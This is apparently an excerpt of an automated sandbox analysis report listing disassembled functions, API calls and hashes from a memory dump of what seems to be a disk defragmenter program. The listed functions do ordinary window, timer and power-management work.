                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ClientMessageRectReleaseSend
                                                                                                                                                                                                                                                                                                • String ID: 8F
                                                                                                                                                                                                                                                                                                • API String ID: 1863454828-180763933
                                                                                                                                                                                                                                                                                                • Opcode ID: d11ef34d3e0fffcceb367614637f6adb86afbda3cb939e7e07ff16f8205efc76
                                                                                                                                                                                                                                                                                                • Instruction ID: d6bf508d08b3a67db9d2b0dabc6a54fdde4e7c081a099a00f88e8aa49dac70a3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d11ef34d3e0fffcceb367614637f6adb86afbda3cb939e7e07ff16f8205efc76
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C3128B5204341AFC314DF68C984E5AB7E9FB88610F104A1EF559C3290EB34A905CB55
                                                                                                                                                                                                                                                                                                Function 0041E180 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(PowrProf.dll,00000001,?,0042198D,00000002), ref: 0041E189
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetSuspendState), ref: 0041E19B
                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 0041E1B7
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                • String ID: PowrProf.dll$SetSuspendState
                                                                                                                                                                                                                                                                                                • API String ID: 145871493-1420736420
                                                                                                                                                                                                                                                                                                • Opcode ID: cc42e22b2c3cdccf1d52a58f3ef6048082fefe304da44aace1865287b01325bc
                                                                                                                                                                                                                                                                                                • Instruction ID: 1295b46436a6d6ef84abe92a3e8f017b2096165fdcf3e5832b2fc3faa33b59df
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc42e22b2c3cdccf1d52a58f3ef6048082fefe304da44aace1865287b01325bc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2E04F357012606B527117366C48D9F2A68DFC1B91349467EF819D1294DF38C9828AAA
                                                                                                                                                                                                                                                                                                Function 0040F280 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Rect$Client$EventMouseTrack
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1879027383-0
                                                                                                                                                                                                                                                                                                • Opcode ID: f4e17d1d92922ba5e38ce16bca10ed58a203127cbb1472af428a1092aff2016b
                                                                                                                                                                                                                                                                                                • Instruction ID: 080451bb04fed4ed38a755b401fe0e9ad2b372c89e4fc55ac88ae6bf0dae2c00
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4e17d1d92922ba5e38ce16bca10ed58a203127cbb1472af428a1092aff2016b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84115EB5104745AFD724CF64C848B9B77E8FB84304F10893EE88A87690E7B9E588CB95
                                                                                                                                                                                                                                                                                                Function 00416430 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00416443
                                                                                                                                                                                                                                                                                                • InflateRect.USER32(?,00000002,00000002), ref: 00416452
                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00416467
                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 0041647A
                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00478B80,000000FF,00416365), ref: 0041648D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Rect$Parent$InflateInvalidateWindow
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3567486610-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 2204eff79a0e70798fbd603735b2eda6009dd2241c77b76db33bd6b2d1834c9f
                                                                                                                                                                                                                                                                                                • Instruction ID: 59621ce25ffcf61443309c609473fb22192222cc28d28fc8a60ac4e9d60af83f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2204eff79a0e70798fbd603735b2eda6009dd2241c77b76db33bd6b2d1834c9f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9BF044B6100304BFC210EB74DC8AD6B77ACFBC8700F008A1DB58A87191EA74F540CB65
                                                                                                                                                                                                                                                                                                Function 00401220 Relevance: 7.5, APIs: 5, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(00497DC0,00094B38,?,004658D6), ref: 0040122D
                                                                                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(00497DC0), ref: 00401243
                                                                                                                                                                                                                                                                                                • GdiplusShutdown.GDIPLUS(00000000), ref: 0040124F
                                                                                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00497DC0), ref: 00401263
                                                                                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00497DC0), ref: 0040126A
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CriticalSection$EnterLeave$GdiplusShutdown
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3506214061-0
                                                                                                                                                                                                                                                                                                • Opcode ID: b92e5560af5050c5c6993437e068edb64c42205fc1de9f9bdd2150818b8b9fdd
                                                                                                                                                                                                                                                                                                • Instruction ID: 085117cba8507ed758f2e3bd9e34728127d7a1f2de7180c4966a7f221b9c7101
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b92e5560af5050c5c6993437e068edb64c42205fc1de9f9bdd2150818b8b9fdd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16E0863166C2145ACA007BB6BC49B663F64AFC0B1471941BFE008B31E0C57855448FFD
                                                                                                                                                                                                                                                                                                Function 0040C4D0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 171COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: Back$GUBar::CDrawObjectFactory::CreateRectTextDraw$Text
                                                                                                                                                                                                                                                                                                • API String ID: 0-2901586747
                                                                                                                                                                                                                                                                                                • Opcode ID: b1efb13953a751cb5c03bbcbe7c56556e47a523d44cd9f1edb886f055ae568a6
                                                                                                                                                                                                                                                                                                • Instruction ID: 94c29d93b79a1152409cb834b352fc504edd985983e521adcc95b20eb26bf893
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1efb13953a751cb5c03bbcbe7c56556e47a523d44cd9f1edb886f055ae568a6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6514F75604315EFC710DF25C880A6BB7E8EB88754F104A2EF84997380E779ED458B9A
                                                                                                                                                                                                                                                                                                Function 0041D750 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • #2.OLEAUT32(80000001,DiskDefrag\Setting Option\Exclude,?,?,?,?,00427EC2,BB40E64E), ref: 0041D7DA
                                                                                                                                                                                                                                                                                                • #9.OLEAUT32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 0041D807
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: DiskDefrag\Setting Option\Exclude$`=
                                                                                                                                                                                                                                                                                                • API String ID: 0-3794877113
                                                                                                                                                                                                                                                                                                • Opcode ID: a4280b9b7dc6183126e2422d7be14f92861be999e049e1a1ed44a2a1cceede15
                                                                                                                                                                                                                                                                                                • Instruction ID: 1b5e8dd470563cbc387b5fcd8bef698c16006e04536aa332a21aa0bb045417de
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4280b9b7dc6183126e2422d7be14f92861be999e049e1a1ed44a2a1cceede15
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9041A371504245AFD304EF55CD85EABBBF8FF88348F00092EF95A82250EB75E944CBA6
                                                                                                                                                                                                                                                                                                Function 004222A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 130windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 004222D6
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001015,?,?), ref: 00422367
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00422400
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 8F
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-180763933
                                                                                                                                                                                                                                                                                                • Opcode ID: e5b35e131d48ee43da0b7e9094fe5589d2cefd60023f22f8b9769e6da7b79c13
                                                                                                                                                                                                                                                                                                • Instruction ID: 003c1d75d670e48058873593885aa4881fdd5922b449336556b7ec6c7a2bda3d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e5b35e131d48ee43da0b7e9094fe5589d2cefd60023f22f8b9769e6da7b79c13
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43418071604311AFC710EF29E880AABB7E4FF88314F444A2EF959DB241D778A944CB95
                                                                                                                                                                                                                                                                                                Function 004320A0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 72windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00432180: SendMessageW.USER32(0047D9D0,00001037,00000000,00000000), ref: 004322A8
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00432180: SendMessageW.USER32(?,00001036,00000000,00000000), ref: 004322BC
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,?,00000000), ref: 00432160
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 8F$DiskDefrag\Setting Option\Optimize$cbbFileSize
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-3449206993
                                                                                                                                                                                                                                                                                                • Opcode ID: 5d012cc000ad30419fbe295ad9283da05f428964ef3f062ec2218de17c19c3bd
                                                                                                                                                                                                                                                                                                • Instruction ID: c484c337b78f61a7d82ad98e4e7a9c8d2f838ff1f30f5547f561464bca46b6c3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d012cc000ad30419fbe295ad9283da05f428964ef3f062ec2218de17c19c3bd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 530121707D021A2BEA147E7A8D93FBE01498B85B08F00993E760BDE2C7CDDD8D484229
                                                                                                                                                                                                                                                                                                Function 00402070 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LoadBitmapW.USER32(00000000,0000008F), ref: 004020B8
                                                                                                                                                                                                                                                                                                • LoadBitmapW.USER32(00000000,0000008E), ref: 004020D8
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402140: SendMessageW.USER32(?,00001037,00000000,00000000), ref: 0040218F
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402140: SendMessageW.USER32(?,00001036,00000000,00000000), ref: 004021A2
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402140: SendMessageW.USER32(?,00001003,00000001,?), ref: 004021C3
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402140: LoadBitmapW.USER32(00000000,00000090), ref: 0040221B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402140: SendMessageW.USER32(?,00001208,00000000,?), ref: 0040227F
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402A30: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000200), ref: 00402ADD
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402A30: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00402AF7
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101E,00000000,0000FFFE), ref: 00402121
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$BitmapLoad$FileInfo
                                                                                                                                                                                                                                                                                                • String ID: 8F
                                                                                                                                                                                                                                                                                                • API String ID: 945603440-180763933
                                                                                                                                                                                                                                                                                                • Opcode ID: 6219d86c06f6b4ea9bab356f1641f6868412c7640f0c57d9bdc72cfda1377a77
                                                                                                                                                                                                                                                                                                • Instruction ID: 6e2bdab270fbbe96b848c0bd2341101d434f26038ac6356a5de8eec39d30edc5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6219d86c06f6b4ea9bab356f1641f6868412c7640f0c57d9bdc72cfda1377a77
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2411737078071535E130B6B2CE4BFEA224CAF14B04F00452EB759BA1D2CDEC694042AE
                                                                                                                                                                                                                                                                                                Function 004226A0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59timeCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • KillTimer.USER32(?,00000001,00000000,3401029,0047D9D0,0047D9D0,0047D9D0,?,0041A424,00000000,00000005,?,00000066,00000000), ref: 004226F8
                                                                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000003E8,00000000), ref: 0042271F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
